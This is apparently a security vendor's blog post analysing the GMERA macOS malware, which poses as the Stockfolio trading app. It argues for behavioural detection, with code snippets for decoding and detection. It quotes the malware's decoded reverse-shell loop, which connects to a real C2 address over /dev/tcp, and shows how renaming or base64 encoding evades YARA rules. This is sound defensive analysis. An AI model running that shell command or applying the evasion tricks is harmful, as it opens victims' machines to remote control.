Last week, researchers at Trend Micro spotted a new piece of in-the-wild macOS malware that spoofs a genuine stock market trading app to open a backdoor and run malicious code. In this post, we first give an overview of how the malware works, and then use this as an example to discuss different detection and response strategies, with a particular emphasis on explaining the principles and advantages of using behavioral detection on macOS.

An Overview of GMERA Malware

Let’s begin by taking a look at the technical details of this new piece of macOS malware.



Two variants were initially discovered by researchers who identified them as GMERA.A and GMERA.B. In this post, we will focus on the interesting points in a particular sample of GMERA.B that pertain to detection and response.

Our sample, which was not analyzed in the previous research, is:





d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Although this sample has been on VirusTotal for 9 days, and the initial Trend Micro research hit the news 5 days ago, it remains undetected by reputation engines on the VT site as of today.





As with the GMERA.A variant, the malware comes in a macOS application bundle named “Stockfoli.app”. The name is a letter shy of a genuine app called “Stockfolio.app”, which the malware purports to be a copy of, and which is placed inside the malicious Stockfoli.app’s Resources folder.

The Stockfolio.app inside the Resources folder appears to be an undoctored version of the genuine app, save for the fact that the malware authors have replaced the original developer’s code signature with their own. We will come back to code signing in the next section.







Of particular note in the Resources folder is the malicious run.sh script.















We can see that in this sample the script contains a block of base64-encoded data which, upon decoding, it writes as a hidden property list file in the ~/Library/LaunchAgents folder with, in this case, the file name .com.apple.upd.plist.

Upon decoding the base64, we see the dropped property list file itself contains more base64-encoded data in its ProgramArguments.

Further decoding reveals a bash script that opens a reverse shell to the attackers’ C2.

while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done
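The two decoding layers described above can be reproduced by an analyst in a few lines. What follows is a minimal sketch, not the tooling used in this research: the function names, the 16-character token threshold and the layout of the sample plist built by `make_sample_blob` are all assumptions made for illustration, and the sample payload is a harmless `echo` command rather than the real script.

```python
import base64
import binascii
import plistlib
import re

# Runs of base64 alphabet characters long enough to be worth decoding (assumed threshold).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def try_b64_text(token):
    """Return the decoded text, or None if the token is not valid base64-encoded UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def embedded_scripts(outer_b64):
    """Decode the outer blob into a plist, then decode any base64 in ProgramArguments."""
    job = plistlib.loads(base64.b64decode(outer_b64))
    scripts = []
    for arg in job.get("ProgramArguments", []):
        for token in B64_TOKEN.findall(str(arg)):
            text = try_b64_text(token)
            if text is not None:
                scripts.append(text)
    return scripts


def make_sample_blob(script):
    """Build a harmless two-layer blob for testing (hypothetical plist layout)."""
    inner = base64.b64encode(script.encode()).decode()
    job = {
        "Label": "com.example.demo",
        "ProgramArguments": ["sh", "-c", f"echo {inner} | base64 --decode | bash"],
        "RunAtLoad": True,
    }
    return base64.b64encode(plistlib.dumps(job)).decode()


print(embedded_scripts(make_sample_blob("echo harmless inner payload")))
```

Because the decoder only looks for base64-shaped tokens inside ProgramArguments, it does not depend on the exact shell command wrapped around them.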













The code sleeps for 10000 seconds, then quits and kills any previous connection. The screen utility is then used to start a new session in ‘detached’ mode. This essentially allows the attacker to resume the same session if the connection should drop at any point. The script then invokes Bash’s interactive mode to redirect the session to the attackers’ device at the IP address shown above over port 25733. In their write-up, the Trend Micro researchers reported seeing the reverse shell used over ports 25733–25736. Disassembly of the main binary in our sample shows that two further ports, 25737 and 25738, may also be utilized, with the latter used with zsh rather than bash as the shell of choice.
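Once a script like this has been decoded, the C2 endpoint can be pulled out mechanically. The sketch below is one possible approach and assumes the attacker uses bash’s `/dev/tcp/<host>/<port>` redirection, as in the sample above; the function names and regular expressions are illustrative rather than taken from any particular tool.

```python
import re

# bash's pseudo-device syntax for opening a TCP connection: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/tcp/(?P<host>[A-Za-z0-9.\-]+)/(?P<port>\d{1,5})")

# An interactive shell (-i) is a common ingredient of a reverse shell one-liner.
INTERACTIVE_SHELL = re.compile(r"\b(?:bash|zsh|sh)\s+-i\b")


def dev_tcp_endpoints(script):
    """Return (host, port) pairs for every /dev/tcp redirection in the script."""
    return [(m.group("host"), int(m.group("port"))) for m in DEV_TCP.finditer(script)]


def looks_like_reverse_shell(script):
    """True if the script pairs an interactive shell with a /dev/tcp redirection."""
    return bool(dev_tcp_endpoints(script)) and bool(INTERACTIVE_SHELL.search(script))


decoded = (
    "while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; "
    "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done"
)
print(dev_tcp_endpoints(decoded), looks_like_reverse_shell(decoded))
```

A check like this is still a static indicator, so it is best treated as a triage aid for the analyst rather than as a detection in its own right.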





Before we move on to discuss detection and response, let’s note one further characteristic of the malware not pointed out in the previous research. The malicious Stockfoli.app’s Info plist is being distributed with at least two different bundle identifiers (we’re sure there will be more). These are:

com.appIe.stockf.stocks

com.appIe.stockfolioses.Stockfoli

Looked at casually, those look like they begin with ‘com.apple’. But closer inspection (or changing the font) reveals that the ‘l’ in “apple” is in fact a capital “I”.

We will come back to the reason for this ruse below.





CERT REVOKED WHACK-A-MOLE

Let’s turn to detection and response. If you’re a Mac user running an unprotected Mac (i.e., you’re not using a Next-Gen solution like SentinelOne), you might be glad to hear that these malicious samples should now fail to execute if you try to download and run them. That’s due to the fact that Apple have since revoked the code signature used to sign these samples.

While it’s great to see Apple on the ball and revoking the signatures of known malware, this kind of after-the-fact protection shouldn’t provide as much comfort as some seem to take from it. A fellow macOS enthusiast remarked to me after this latest discovery that Apple’s action proved to him that Macs are secure against malware, to which my somewhat more circumspect response was: how long was this malware in the wild before it was discovered and the signature revoked? How many users were infected by this malware before it became publicly known? How many unknown, validly signed malware samples are still out there?

It won’t be long before the threat actors package their wares in a newly signed bundle and the game of whack-a-mole begins again: attackers create and distribute a malicious app with a valid code signature; after some variable amount of time in the wild, the malware is discovered and Apple revoke the signature; the attackers then repackage the malware with a fresh signature and the process begins all over again!

If you’re the victim, a day, an hour, or even a minute is too late if you’re relying on this kind of mechanism to protect you. In fact, it inherently relies on some people becoming victims in order for samples to be discovered and signatures revoked in the first place. Cold comfort if you’re one of the unfortunate early victims!

Perhaps not widely appreciated is just how easy it is for bad actors to acquire valid code signing identities. Given the rewards, bad actors are quite happy to burn $99 subscriptions and play whack-a-mole with Apple. This is relatively easy to do as there are many fake and compromised (i.e., hacked) AppleIDs that can be turned into developer signatures using stolen credit cards and other payment methods.

Repackaging the same malicious script inside a new app bundle with a new cert is a task that can be automated with very little effort; it is a technique we see the commodity adware and PUP players use on a daily basis.

YARA YARA, YADA YADA…

To be fair, Apple don’t just rely on revoking certs of discovered malware though. Indeed, they have been talking a lot about ‘defense in depth’ recently (WWDC 2019), and as regular readers of this blog will know, Apple have a suite of built-in tools like Gatekeeper, XProtect and MRT to help block and remediate known malware. With the upcoming Catalina release, Apple will add compulsory notarization to their armoury, too.













These tools rely on a combination of different strategies, from extended file attributes, hardcoded file paths and hashes to Yara rules that specify particular characteristics of a binary. While hashes and file paths are typically limited to a single variant of malware, Yara rules at least have the advantage that they can be used to identify families of malware that share similar characteristics. Here’s an example from XProtect:

This Yara rule specifies five sets of strings. If they all appear in a Mach-O executable with a file size of less than 200KB, XProtect should block the file as a member of the malware family MACOS.6175e25. Let’s translate those strings from hex to see what they actually are:

To be clear, this rule has nothing to do with the GMERA malware under discussion here. At the time of writing, neither XProtect nor MRT.app has been updated to detect GMERA malware. The point here is to show how Yara rules in general work. The rule shown above is in fact for some malware we’ve reversed before. From the malware author’s point of view, it is easy to see just what XProtect is hitting on, and with that knowledge, to adapt his or her work.

But wouldn’t that be difficult? Not at all. It’s far less work for malware authors than it is for Apple. A simple way for malware authors to avoid Yara rules like the one above is to rename methods (changing a single letter would be enough to break that rule), or to use an encoding like base64, which can be applied multiple times. There really are numerous ways to make minor changes that will break Yara rules. Meanwhile, Apple (and third-party security vendors that rely on the same techniques) have to wait until the changes come to light, then test and update their revised signatures. All the while, the threat actors are achieving compromises while Apple and other vendors continually have to play catch-up, knowing full well that their updated signatures will be obsolete within hours.
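To make the fragility concrete, here is a small sketch that mimics the logic of an “all of these strings, under this file size” rule. It is not a Yara engine and the strings are not taken from XProtect: `REQUIRED_STRINGS`, the size limit and the sample bytes are hypothetical stand-ins chosen only to show how a one-letter rename or a layer of base64 defeats an exact string match.

```python
import base64

# Hypothetical method names standing in for the strings a real rule might require.
REQUIRED_STRINGS = [b"startAgentWithConfig", b"uploadResults"]
MAX_SIZE = 200 * 1024  # mirrors a "file size under 200KB" condition


def matches_signature(data):
    """True only if the file is small enough and every required string is present."""
    return len(data) < MAX_SIZE and all(s in data for s in REQUIRED_STRINGS)


# Stand-in for a binary containing both strings.
original = b"\x00header\x00startAgentWithConfig\x00uploadResults\x00"

# Evasion 1: rename one method by a single letter.
renamed = original.replace(b"startAgentWithConfig", b"startAgentWithConfiq")

# Evasion 2: store one string base64-encoded and decode it at run time.
encoded = original.replace(b"uploadResults", base64.b64encode(b"uploadResults"))

for name, sample in [("original", original), ("renamed", renamed), ("encoded", encoded)]:
    print(name, matches_signature(sample))
```

Both variants behave identically at run time, yet only the original still satisfies the rule.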

A crucial part of this unwinnable game is that, as with revoking certs, file paths, hashes and Yara rules all have one fatal weakness: they rely on prior discovery of a sample. Once again, after-the-fact detection is no solace for the before-everyone-else-heard-about-it victims.

Beating macOS Malware By Detecting Suspicious Behavior

Fortunately, there is another way to detect and block malware which doesn’t rely on prior knowledge. Malware and threat actors have limited and specific goals. While the implementation details can be vast and varied, the actual behavior required to meet those objectives is both finite and definable. With a behavioral detection engine, the implementation details become entirely irrelevant.

Just as we do not detect criminals by looking at the way their brains are wired or measuring the shape and size of their skulls (anymore!) but rather by assessing the way they act against expected social and legal norms, so we can do the same with malicious software, scripts and processes.

Regardless of the inner wiring, malicious processes – like criminals – engage in certain kinds of undesirable behavior. By tracking and contextualizing individual events in the process lifecycle, we can put together a picture or ‘story’ that says:

“Taken together, these events constitute undesirable behavior and we should alert on and/or block them.”

By focusing on dynamic behavior rather than relying on static characteristics like strings, hashes and paths, we can identify malware even if we have not seen its particular implementation previously.

This is the principle behind SentinelOne’s behavioral and AI engines. Although I can’t go into the actual details of how SentinelOne does its magic under the hood, we can get a sense of how behavioral detection works in principle by looking at the GMERA malware as an example.

As we have seen, the macOS.GMERA malware writes a persistence agent to ~/Library/LaunchAgents. If you were manually threat hunting on macOS, a newly written LaunchAgent would immediately cause you to investigate further, and the same can be true for automated responses. We also saw that in the case of the GMERA malware, the parent process dropped a persistence agent that was made invisible in the Finder by prefixing a period to the filename.



That should raise our suspicion even further. Such behavior is not only unusual for legitimate software but also has no obvious legitimate purpose. The primary reason for allowing processes to write invisible files is to hide temporary data and metadata that have no conceivable interest to the user. While there may be a few other legitimate uses (such as DRM licensing), there’s little reason why a genuine persistence agent should be invisible to the user in the Finder.
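A manual threat hunter can check for this condition directly. The following is a minimal sketch that lists dot-prefixed property lists in a LaunchAgents folder; the function name is our own, and the check covers only the per-user folder passed to it.

```python
from pathlib import Path


def hidden_launch_agents(launch_agents_dir):
    """Return dot-prefixed .plist files found directly inside the given folder."""
    folder = Path(launch_agents_dir)
    if not folder.is_dir():
        return []
    return sorted(
        p for p in folder.iterdir()
        if p.is_file() and p.name.startswith(".") and p.name.endswith(".plist")
    )


# Typical per-user location on macOS; the folder may not exist on other systems.
for agent in hidden_launch_agents(Path.home() / "Library" / "LaunchAgents"):
    print("hidden persistence agent:", agent)
```

Files such as .DS_Store are ignored because they do not end in .plist, which keeps the output focused on launchd jobs.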

Thirdly, this LaunchAgent’s behavior itself is anomalous. Rather than executing a file at a given path, it decodes and executes in memory a script that is obfuscated with base64. While there’s no doubt some conceivable edge case where this might be legitimate, in the typical enterprise situation such behavior is almost certainly designed to deceive and something we should be alerting on. Even the edge cases are worthy of our attention, if only to encourage wayward users to engage in better, safer and more transparent practices.
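As a rough illustration of how that anomaly could be expressed, the sketch below inspects a launchd job’s ProgramArguments and reports when the job runs an inline shell command or decodes base64 at launch. The heuristics, function name and both sample plists are assumptions for demonstration; in particular, the suspicious sample is a hypothetical layout and not a copy of the GMERA plist.

```python
import plistlib
import re
from pathlib import PurePosixPath

SHELLS = {"sh", "bash", "zsh"}
B64_DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)\b")


def launch_agent_findings(plist_bytes):
    """Return a list of human-readable findings for a launchd job definition."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    args = [str(a) for a in args]
    findings = []
    if not args:
        return findings
    # A shell invoked with -c runs a command string rather than a file on disk.
    if PurePosixPath(args[0]).name in SHELLS and "-c" in args[1:]:
        findings.append("runs an inline shell command instead of a file on disk")
    if any(B64_DECODE.search(a) for a in args):
        findings.append("decodes base64 at launch")
    return findings


# Hypothetical samples built for this demonstration.
suspicious = plistlib.dumps({
    "Label": "com.example.demo",
    "ProgramArguments": ["sh", "-c", "echo ZWNobyBoaQ== | base64 --decode | bash"],
})
benign = plistlib.dumps({
    "Label": "com.example.helper",
    "ProgramArguments": ["/usr/local/bin/helper", "--serve"],
})
print(launch_agent_findings(suspicious))
print(launch_agent_findings(benign))
```

Neither finding proves malice on its own, which is why such observations are more useful as inputs to a wider picture than as standalone verdicts.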

Finally, as we noted above, the parent application uses a bundle identifier that is clearly intended to mislead.

This is a sleight-of-hand intended to trick unwary users, who may easily overlook such a process as benign. The tactic may also trick some unsophisticated security solutions that check whether processes with a “com.apple” bundle identifier are actually signed with Apple’s signature. Replacing the ‘l’ in Apple with a capital ‘I’ would neatly sidestep such a heuristic.
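A heuristic that is not fooled by this substitution can be sketched in a few lines. The mapping below covers only a handful of ASCII lookalikes and is an assumption for illustration, not a complete confusables table; the function name is likewise our own.

```python
# Characters commonly used to imitate others in ASCII-only identifiers (partial list).
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "0": "o"})

APPLE_PREFIX = "com.apple."


def spoofs_apple_prefix(bundle_id):
    """True if the identifier only looks like it starts with com.apple."""
    if bundle_id.lower().startswith(APPLE_PREFIX):
        # Genuinely uses the prefix; whether it is signed by Apple is a separate check.
        return False
    # Map lookalikes first, while a capital I is still distinguishable from a lowercase l.
    normalized = bundle_id.translate(CONFUSABLES).lower()
    return normalized.startswith(APPLE_PREFIX)


for bundle_id in [
    "com.appIe.stockf.stocks",
    "com.appIe.stockfolioses.Stockfoli",
    "com.apple.Safari",
]:
    print(bundle_id, spoofs_apple_prefix(bundle_id))
```

Identifiers that really do begin with com.apple are deliberately not flagged here, since those are better handled by verifying the code signature.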

If you were writing a detection engine, you might consider that as something to look out for – homograph attacks are a tried and trusted technique in URL and Domain Name spoofing – but you might equally well not care either way. It matters less what a file is called and more what it does. A hidden persistence mechanism opening a reverse shell in memory that has been dropped by an application with no apparent functional relation? What could be more suspicious than that?
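The idea of weighing several observations together, rather than judging any one of them in isolation, can be sketched as a simple scoring model. This is purely illustrative and is not how SentinelOne’s engines work: the field names, weights and threshold are hypothetical values chosen to show the principle.

```python
from dataclasses import dataclass


@dataclass
class ProcessStory:
    """Observations gathered about one process tree (hypothetical field names)."""
    wrote_launch_agent: bool = False
    launch_agent_hidden: bool = False
    runs_encoded_inline_script: bool = False
    opens_reverse_shell: bool = False
    lookalike_bundle_id: bool = False


# Illustrative weights: no single common event is enough to alert on its own.
WEIGHTS = {
    "wrote_launch_agent": 1,
    "launch_agent_hidden": 3,
    "runs_encoded_inline_script": 3,
    "opens_reverse_shell": 4,
    "lookalike_bundle_id": 2,
}
ALERT_THRESHOLD = 5


def score(story):
    """Sum the weights of every observation that is set on the story."""
    return sum(weight for name, weight in WEIGHTS.items() if getattr(story, name))


def verdict(story):
    """Return 'alert' when the combined evidence crosses the threshold."""
    return "alert" if score(story) >= ALERT_THRESHOLD else "observe"


gmera_like = ProcessStory(True, True, True, True, True)
ordinary_installer = ProcessStory(wrote_launch_agent=True)
print(verdict(gmera_like), verdict(ordinary_installer))
```

Note that none of the inputs refers to a hash, a path or a string inside the binary, so a repackaged or re-signed variant that behaves the same way would produce the same story.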

Detecting GMERA Malware Through Behavioral Inspection

So much for the theory, but does it work in practice? Although the GMERA malware application bundle itself will fail to run once the cert has been revoked (unless we were to remove the code signing or re-sign it with an ad hoc cert), it is still perfectly possible to execute the malicious run.sh script bundled in the application’s Resources folder without complaint from Apple’s built-in security tools. That means we can still test a significant part of the malware’s behavior. And of course, it means an attacker could do this manually, and so could another malicious process that found the Stockfoli.app bundle lying around, perhaps in a subsequent infection incident.





Let’s see how the SentinelOne behavioral engine reacts to execution of the run.sh script. As soon as we execute the script, we get a detection on the Agent side.



We can see more details on the Management console side:

Note the MITRE ATT&CK TTPs:

Process dropped a hidden suspicious plist to achieve persistency {T1150}

Process wrote a hidden file to achieve persistency {T1158}

Process achieved persistency through launchd job {T1160}





As we have set the policy on our test machine to detect rather than block — so that we can inspect the malware’s behavior — SentinelOne lets the script continue its execution. The Attack Story Line shows the hierarchy of processes and the entire kill chain.

Of course, in a live deployment you would set the policy to simply block this at the outset. For research purposes, however, the Detect Only policy is useful to examine the malware’s behavior and learn more about our adversaries’ TTPs.

Conclusion

The recently discovered GMERA malware doesn’t offer anything new in terms of attacker tools, tactics and procedures. It leverages a fairly well-worn, easily constructed route to compromise and persistence: a fake app, a Launch Agent for persistence and a simple bash or zsh-based reverse shell to open the victim up to post-exploitation, data exfiltration and perhaps further infection. And yet, so many solutions – including Apple’s built-in offerings – fail to detect these kinds of threats pre-execution or on-execution, instead relying on discovery and software updates to belatedly offer protection to those who were lucky enough to avoid becoming victims in the first wave.

A solution that offers real defense-in-depth, with multiple static, behavioral and AI engines packaged in a single agent is the only way to stay ahead of attackers and protect your Mac users from whatever new threat comes next. Remember, malware authors can innovate to their hearts’ content, but insofar as they keep on acting suspiciously, we can keep on rooting them out.

